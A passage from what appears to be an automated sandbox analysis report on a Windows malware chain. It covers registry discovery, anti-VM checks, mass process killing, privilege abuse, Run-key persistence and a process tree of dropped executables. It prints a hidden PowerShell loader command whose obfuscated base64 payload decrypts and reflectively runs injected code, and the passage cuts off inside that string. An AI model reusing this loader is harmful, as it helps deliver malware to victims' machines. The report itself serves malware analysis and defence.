Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5e4bf76d9c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5e4bf76d9c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
6356	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 64 IoCs

pid	Process
7660	taskkill.exe
5912	taskkill.exe
7604	taskkill.exe
5248	taskkill.exe
2008	taskkill.exe
11636	taskkill.exe
13132	taskkill.exe
4484	taskkill.exe
2184	taskkill.exe
2276	taskkill.exe
1324	taskkill.exe
2944	taskkill.exe
1292	taskkill.exe
3284	taskkill.exe
2328	taskkill.exe
2448	taskkill.exe
7452	taskkill.exe
4620	taskkill.exe
4664	taskkill.exe
6320	taskkill.exe
6496	taskkill.exe
6784	taskkill.exe
10996	taskkill.exe
4408	taskkill.exe
5276	taskkill.exe
832	taskkill.exe
2668	taskkill.exe
6392	taskkill.exe
428	taskkill.exe
1728	taskkill.exe
5140	taskkill.exe
964	taskkill.exe
1500	taskkill.exe
4928	taskkill.exe
5044	taskkill.exe
664	taskkill.exe
2596	taskkill.exe
4384	taskkill.exe
1500	taskkill.exe
6620	taskkill.exe
5088	taskkill.exe
452	taskkill.exe
5348	taskkill.exe
4348	taskkill.exe
12948	taskkill.exe
6652	taskkill.exe
4528	taskkill.exe
4500	taskkill.exe
1928	taskkill.exe
3592	taskkill.exe
6244	taskkill.exe
7988	taskkill.exe
6152	taskkill.exe
1092	taskkill.exe
11916	taskkill.exe
2984	taskkill.exe
2996	taskkill.exe
696	taskkill.exe
7196	taskkill.exe
5952	taskkill.exe
4432	taskkill.exe
5880	taskkill.exe
5408	taskkill.exe
3512	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880582502924186"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{7092A1A1-935E-448E-AE18-6040FAA0E5D9}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{17FD2C58-43AF-4A47-BB85-D89101E0361C}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{71707F41-0038-4A44-B293-1226297BCF62}	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2194519399.txt\	cmd.exe
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_718592000.txt\	cmd.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3992	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2808	1r83R6.exe
2808	1r83R6.exe
728	rapes.exe
728	rapes.exe
4564	2h3853.exe
4564	2h3853.exe
4564	2h3853.exe
4564	2h3853.exe
4564	2h3853.exe
4564	2h3853.exe
4292	MSBuild.exe
4292	MSBuild.exe
4292	MSBuild.exe
4292	MSBuild.exe
3992	powershell.exe
3992	powershell.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
3420	captcha.exe
3420	captcha.exe
3420	captcha.exe
3420	captcha.exe
3420	captcha.exe
3420	captcha.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
5476	powershell.exe
5476	powershell.exe
5476	powershell.exe
5320	a1c5de4625.exe
5320	a1c5de4625.exe
5320	a1c5de4625.exe
5320	a1c5de4625.exe
5320	a1c5de4625.exe
5320	a1c5de4625.exe
3320	rapes.exe
3320	rapes.exe
2984	5e4bf76d9c.exe
2984	5e4bf76d9c.exe
5632	chrome.exe
5632	chrome.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
1528	58424ecd61.exe
1528	58424ecd61.exe
1528	58424ecd61.exe
1528	58424ecd61.exe
1528	58424ecd61.exe
7336	MSBuild.exe
7336	MSBuild.exe
7336	MSBuild.exe
7336	MSBuild.exe
7480	8e5094a924.exe
7480	8e5094a924.exe
7480	8e5094a924.exe
7480	8e5094a924.exe
5460	MSBuild.exe

Suspicious behavior: LoadsDriver 7 IoCs

pid	Process
7840	tzutil.exe
656	Process not Found
656	Process not Found
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5716	p3hx1_003.exe
5716	p3hx1_003.exe
5716	p3hx1_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2652	tasklist.exe
Token: SeDebugPrivilege	5368	tasklist.exe
Token: SeDebugPrivilege	4256	tasklist.exe
Token: SeDebugPrivilege	5344	tasklist.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4688	tasklist.exe
Token: SeDebugPrivilege	4432	tasklist.exe
Token: SeDebugPrivilege	624	tasklist.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	5780	tasklist.exe
Token: SeDebugPrivilege	3168	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4604	powershell.exe
Token: SeSecurityPrivilege	4604	powershell.exe
Token: SeTakeOwnershipPrivilege	4604	powershell.exe
Token: SeLoadDriverPrivilege	4604	powershell.exe
Token: SeSystemProfilePrivilege	4604	powershell.exe
Token: SeSystemtimePrivilege	4604	powershell.exe
Token: SeProfSingleProcessPrivilege	4604	powershell.exe
Token: SeIncBasePriorityPrivilege	4604	powershell.exe
Token: SeCreatePagefilePrivilege	4604	powershell.exe
Token: SeBackupPrivilege	4604	powershell.exe
Token: SeRestorePrivilege	4604	powershell.exe
Token: SeShutdownPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeSystemEnvironmentPrivilege	4604	powershell.exe
Token: SeRemoteShutdownPrivilege	4604	powershell.exe
Token: SeUndockPrivilege	4604	powershell.exe
Token: SeManageVolumePrivilege	4604	powershell.exe
Token: 33	4604	powershell.exe
Token: 34	4604	powershell.exe
Token: 35	4604	powershell.exe
Token: 36	4604	powershell.exe
Token: SeDebugPrivilege	3084	tasklist.exe
Token: SeDebugPrivilege	5456	tasklist.exe
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeDebugPrivilege	6048	tasklist.exe
Token: SeDebugPrivilege	3516	tasklist.exe
Token: SeDebugPrivilege	2652	tasklist.exe
Token: SeDebugPrivilege	2172	tasklist.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	4532	tasklist.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	3616	taskkill.exe
Token: SeDebugPrivilege	4896	taskkill.exe
Token: SeDebugPrivilege	4432	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	5832	taskkill.exe
Token: SeDebugPrivilege	5912	taskkill.exe
Token: SeDebugPrivilege	5088	taskkill.exe
Token: SeDebugPrivilege	2576	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	5956	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	5276	taskkill.exe
Token: SeDebugPrivilege	5800	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
2808	1r83R6.exe
5632	chrome.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4160	b6c719608f.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
6056	msedge.exe

Suspicious use of SendNotifyMessage 23 IoCs

pid	Process
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4160	b6c719608f.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4988	firefox.exe
4160	b6c719608f.exe
4160	b6c719608f.exe
4160	b6c719608f.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4988	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3280 wrote to memory of 5448	3280	file.exe	87
PID 3280 wrote to memory of 5448	3280	file.exe	87
PID 3280 wrote to memory of 5448	3280	file.exe	87
PID 2172 wrote to memory of 4784	2172	cmd.exe	88
PID 2172 wrote to memory of 4784	2172	cmd.exe	88
PID 5448 wrote to memory of 2808	5448	e9T61.exe	91
PID 5448 wrote to memory of 2808	5448	e9T61.exe	91
PID 5448 wrote to memory of 2808	5448	e9T61.exe	91
PID 3068 wrote to memory of 5244	3068	cmd.exe	92
PID 3068 wrote to memory of 5244	3068	cmd.exe	92
PID 2808 wrote to memory of 728	2808	1r83R6.exe	96
PID 2808 wrote to memory of 728	2808	1r83R6.exe	96
PID 2808 wrote to memory of 728	2808	1r83R6.exe	96
PID 5448 wrote to memory of 4564	5448	e9T61.exe	97
PID 5448 wrote to memory of 4564	5448	e9T61.exe	97
PID 5448 wrote to memory of 4564	5448	e9T61.exe	97
PID 728 wrote to memory of 2376	728	rapes.exe	103
PID 728 wrote to memory of 2376	728	rapes.exe	103
PID 2376 wrote to memory of 5912	2376	YGYZCmt.exe	106
PID 2376 wrote to memory of 5912	2376	YGYZCmt.exe	106
PID 2376 wrote to memory of 5912	2376	YGYZCmt.exe	106
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 2376 wrote to memory of 4292	2376	YGYZCmt.exe	107
PID 728 wrote to memory of 4356	728	rapes.exe	108
PID 728 wrote to memory of 4356	728	rapes.exe	108
PID 728 wrote to memory of 4356	728	rapes.exe	108
PID 4356 wrote to memory of 3788	4356	cmd.exe	110
PID 4356 wrote to memory of 3788	4356	cmd.exe	110
PID 4356 wrote to memory of 3788	4356	cmd.exe	110
PID 3788 wrote to memory of 3992	3788	cmd.exe	112
PID 3788 wrote to memory of 3992	3788	cmd.exe	112
PID 3788 wrote to memory of 3992	3788	cmd.exe	112
PID 3992 wrote to memory of 2748	3992	powershell.exe	113
PID 3992 wrote to memory of 2748	3992	powershell.exe	113
PID 3992 wrote to memory of 2748	3992	powershell.exe	113
PID 728 wrote to memory of 3420	728	rapes.exe	115
PID 728 wrote to memory of 3420	728	rapes.exe	115
PID 3420 wrote to memory of 2976	3420	captcha.exe	116
PID 3420 wrote to memory of 2976	3420	captcha.exe	116
PID 3420 wrote to memory of 5784	3420	captcha.exe	119
PID 3420 wrote to memory of 5784	3420	captcha.exe	119
PID 5784 wrote to memory of 1676	5784	net.exe	121
PID 5784 wrote to memory of 1676	5784	net.exe	121
PID 3420 wrote to memory of 1900	3420	captcha.exe	122
PID 3420 wrote to memory of 1900	3420	captcha.exe	122
PID 3420 wrote to memory of 2652	3420	captcha.exe	124
PID 3420 wrote to memory of 2652	3420	captcha.exe	124
PID 3420 wrote to memory of 5368	3420	captcha.exe	126
PID 3420 wrote to memory of 5368	3420	captcha.exe	126
PID 3420 wrote to memory of 4256	3420	captcha.exe	128
PID 3420 wrote to memory of 4256	3420	captcha.exe	128
PID 3420 wrote to memory of 5892	3420	captcha.exe	130
PID 3420 wrote to memory of 5892	3420	captcha.exe	130
PID 3420 wrote to memory of 5344	3420	captcha.exe	132
PID 3420 wrote to memory of 5344	3420	captcha.exe	132
PID 3420 wrote to memory of 4952	3420	captcha.exe	134
PID 3420 wrote to memory of 4952	3420	captcha.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2760
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:11204

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3280
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e9T61.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e9T61.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5448
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1r83R6.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1r83R6.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:728
    - - C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2376
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:5912
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4292
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4356
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwg